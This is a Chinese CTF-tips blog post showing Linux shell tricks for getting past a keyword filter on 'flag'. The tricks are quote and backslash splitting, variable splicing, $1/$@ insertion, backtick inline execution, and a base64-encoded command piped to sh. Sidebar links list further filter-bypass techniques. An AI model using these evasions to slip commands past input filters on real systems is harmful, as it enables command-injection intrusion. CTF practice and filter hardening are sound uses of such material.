Linux系统下绕过某个关键字的小技巧,比如flag关键字

最新推荐文章于 2024-06-01 16:25:22 发布
最新推荐文章于 2024-06-01 16:25:22 发布
阅读量2k 收藏 16
点赞数 8
分类专栏: CTF小技巧 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44632787/article/details/119047634
版权

Linux系统下绕过某个关键字的小技巧,比如绕过flag关键字

首先先在linux系统下创建一个文件名为flag.txt的文件。里面的内容为:This is Flag!
在这里插入图片描述

这里提供几个绕过某个关键字的小技巧。
单引号绕过: cat fla’g’.txt
在这里插入图片描述
双引号绕过: cat fla"g".txt
在这里插入图片描述

反斜线绕过: cat f\lag.txt
在这里插入图片描述

变量拼接绕过: a=g;cat fla$a.txt
在这里插入图片描述

$+数字绕过: cat fl$1ag.txt,cat fl$2ag.txt,cat fl$3ag.txt
在这里插入图片描述

$@绕过: cat fl$@ag.txt
在这里插入图片描述
Base64绕过: echo Y2F0IGZsYWcudHh0|base64 -d|sh
先用base64进行编码,再用命令进行解读。从而达到执行。这里用的是sh,sh的大部分脚本都可以在bash下运行。这里的Y2F0IGZsYWcudHh0经过base64解码后为:cat flag.txt
在这里插入图片描述
内敛绕过: cat `ls`
内联,就是将反引号内命令的输出作为输入执行。
在这里插入图片描述

若丶时光破灭
关注
  • 8
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
flag到底过滤了什么东西?
暴走灰太狼
11-04 2394
解题路径 先提交1试试看: 发现显示是正常的,然后再提交id=1': 说明'是可以影响SQL语句的,并没有被过滤掉 然后我们尝试id=1' or ''='发现空格和or关键字都没有被过滤,很好 再尝试看and关键字,令id=1' and 1=1 or''=':发现报错,将and换成大写也不行,看来是被过滤掉了 接着尝试使用()、/**/、/*!*/等方法绕过,发现/*!关键字*/的方法是可...
CTFWeb-命令执行漏洞过滤的绕过姿势
热门推荐
道阻且长,行则将至。
04-29 1万+
文章目录前言CTF题目绕过姿势命令联合执行关键词的绕过内联执行绕过多种解法变量拼接内联执行Base64编码总结 前言 为了备战(划水)5 月份广东省的 “红帽杯” 网络安全竞赛,继续开始到 BUUCTF 平台练习 CTF 题目。在去年参加的第四届强网杯全国网络安全竞赛中,就遇到过命令执行漏洞绕过的题目 CTF解题-2020年强网杯参赛WriteUp(题目名称 “主动” ),当时采用了 base64 编码联合反引号、变量拼接两种方式绕过了 flag 关键字的过滤并读取了 flag 值: 本文目的在于结合 BU
CTF 命令执行绕过总结
最新发布
jnszstmei的博客
06-01 411
tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示。或:rce-xor-or.php & rce-xor-or.py。# ls -t >shell 将输出输入到shell文件中。异或:rce-xor.php & rce-xor.py。%09(url传递)(cat%09flag.php)sh /flag 2>%261 //报错出文件内容。2、1使用空变量$*和$@,$x,${x}绕过。7、异或无符号(过滤0-9a-zA-Z)more:一页一页的显示档案内容。
【Flag】-PHP-正则绕过
soldi_er的博客
09-02 1603
文章目录【RCTF2020】calc通用字符集合正则字符替换[a-z]落脚函数参考 最近RCTF分站赛要开始了,梳理一些知识。 【RCTF2020】calc 主要check源码如下 $str = $_GET['num']; $blacklist = ['[a-z]', '[\x7f-\xff]', '\s',"'", '"', "`", '\[', "\]","\$", '_', "\\\\",'\^', ","]; foreach ($blacklist as $blackitem) {
绕过之cat|/ flag
m0_61011147的博客
09-06 1989
绕过之cat|/ flag
linux下的 ?绕过拦截【通配符绕过
Sp4rkW的博客
05-27 2244
前言 /???/d?r /???/d[i]r /???/di[r] 这就是通配符的一个典型运用原理是匹配程序/bin/dir 运行结果如下: 更多通配符使用参考google或者这篇文章 通配符的绕过使用 谈谈CTF中常见情况吧,cat,vim等等无法使用去查看flag文件 简单绕过方法 /???/??t h???/f??????? 再过分一些? /???/??t h?...
命令执行及绕过
qq_51175992的博客
07-10 172
CTF中常见的题型——命令指向及绕过
Linux 中awk 提取包含某个关键字的段落
09-14
Linux系统中,awk是一个极其强大的文本分析工具,它允许用户根据指定的模式匹配对文本进行处理。当你需要从大量文本中提取包含特定关键字的段落时,awk就显得非常有用。下面我们将深入探讨如何使用awk来实现这一...
U盘安装RedFlag-Desktop-11.0红旗Linux系统
03-26
本文将详细介绍如何通过U盘安装RedFlag-Desktop-11.0红旗Linux系统,这对于那些希望在实体机上体验红旗Linux的用户来说非常实用。 首先,你需要准备以下材料: 1. 一个8GB或更大的U盘,用于制作启动盘。 2. U盘启动...
Linux下的Apache与PHP安全设置技巧
01-10
在php.ini文件中使用如下 safe_mode = On (使用安全模式) safe_mode = Off (关闭安全模式) 在apache的httpd.conf中VirtualHost的相应设置方法 php_admin_flag safe_mode On (使用安全模式) php_admin_flag safe_...
Linux系统下Grub密码的设置.pdf
09-06
它可以防止未经授权的用户访问Linux系统,以单用户模式登录系统并修改root用户密码,从而获取系统的最高权限。因此,设置Grub密码是非常必要的。 二、设置Grub密码的方法 有两种方法可以设置Grub密码,一种是在...
查看linux文件系统块大小的实现方法
01-20
linux系统上,可以用命令tune2fs ,测试如下 [root@localhost test10g]# tune2fs -help tune2fs 1.35 (28-Feb-2004) tune2fs: invalid option -- h Usage: tune2fs [-c max-mounts-count] [-e errors-behavior] ...
总结,复习,整合命令执行漏洞实现及其绕过(绕过方式大全)
贤鱼的博客
09-13 2217
复习前文知识并作总结,值得收藏以备不时之需
linux常见绕过方法
wojiushilsy的博客
05-14 2440
空格过滤一些命令分隔符花括号的别样用法黑名单绕过 空格过滤 < 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等 一些命令分隔符 linux中:%0a 、%0d 、; 、& 、| 、&&、|| windows中:%0a、&、|、%1a(一个神奇的角色,作为.bat文件中的命令分隔符) 花括号的别样用法 在Linux bash中还可以使用{OS_COMMAND,ARGUMENT}来执行系统命令 {cat,flag.
CTF赛题PHP7 正则绕过
kelenwait的博客
08-19 2512
题目为ctf web中php正则绕过题 前言:由于长度限制,且不像其他题目告知flag.php的内容, 笔者并没有求出flag绕过思路可参考,也欢迎ctf大佬指点迷津。 题目如下,解析flag.php中的flag变量 <?php include("flag.php"); if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)>20){ die("Too Long."); }
catf1ag web题目 WriteUp(wp)
Anton1a的博客
01-16 7705
catf1ag web题目 WriteUp
catf1ag [两小时AK赛] - WEB - easy_unser
weixin_56051888的博客
05-12 644
<?php //flag in /flag show_source('./index.php'); class catf1ag{ public $target='flag'; function __wakeup(){ $this->target = "catf1ag is CTF platform!"; } function __destruct(){ $fp = fopen("catf1ag.php","w"); ...
catf1ag CTF刷题1(比较入门)
weixin_63231007的博客
05-09 902
1. 变量覆盖_extract _extract函数存在变量覆盖,因此再get传入_init_str=6即可满足条件 2. 等于False md5()函数存在漏洞,传入为数组时,会报错返回NULL值,满足==0 3. 啥都没了 主机关机了,以为啥都没了,没想到。。。肯定是备份考察 index.php.bak index.php.swp 发现.index.php.swp下载的文件里flag 4. 文件包含 题目说了是文件包含漏洞。发现?file=参数,查看源码得知flag所在文件.
Linux下的命令执行绕过技巧合集(渗透测试专用)
Thunderclap的博客
02-23 3459
Linux下的命令执行绕过技巧合集(渗透测试专用)
我该如何获取flag.txt的读取权限
05-05
获取flag.txt读取权限需要了解你想要访问的系统或应用程序的安全机制和访问控制策略。如果你没有获得授权或者没有足够的权限,那么你就不能访问flag.txt文件。 如果你是在参加CTF比赛,那么你需要寻找漏洞或者利用已知的漏洞来获取读取flag.txt的权限。但是请注意,在现实世界中,未经授权获取数据是非法行为,可能会导致法律后果。 在任何情况下,我都不会为非法行为提供帮助或指导。请遵守法律法规,并遵循合法渠道获取所需权限。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值